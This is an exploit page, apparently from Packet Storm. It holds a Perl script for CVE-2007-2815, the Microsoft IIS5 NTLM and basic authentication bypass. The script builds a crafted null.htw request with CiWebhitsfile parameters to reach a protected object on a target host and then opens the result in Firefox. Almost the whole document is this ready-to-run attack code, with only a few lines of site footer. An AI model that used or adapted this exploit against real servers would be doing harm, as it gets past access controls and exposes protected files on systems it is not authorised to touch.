Exploit that takes advantage of the Microsoft IIS5 NTLM and basic authentication bypass vulnerability.
da48bc1fb0d7baf79ec390c809a98038135a0452d168b8ba8cd128e1daa06466#######################
# CVE-2007-2815
# ff0000
# ff0000@humanoid.net
# 01/06/2007
#######################
#! /usr/bin/perl
use LWP 5.64;
require "getopt.pl";
&Getopt('shop');
$browser = LWP::UserAgent->new;
$proto=$opt_s;if($opt_s){$proto="https";}else{$proto="http";}
$host=$opt_h;if(!$opt_h){&usage();}
$obj =$opt_o;if(!$opt_o){&usage();}
$port=$opt_p;if(!$opt_p){$port=80;}
$url = "$proto://$host:$port/b00/null.htw?CiWebhitsfile=$obj&CiRestriction=b&CiHiliteType=full";
$command = "c:\\Program Files\\Mozilla Firefox\\firefox.exe";
$response = $browser->get($url);
$browser->timeout(10);
if($response->is_success){`"$command" "$url"`;}
else{print "\n[!] Unable to connect to $host on port $port.\n";}
sub usage{print "$0 <-h hostname | ip address> <-o protected object> [-p port] [-ssl] ";exit;}
=
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed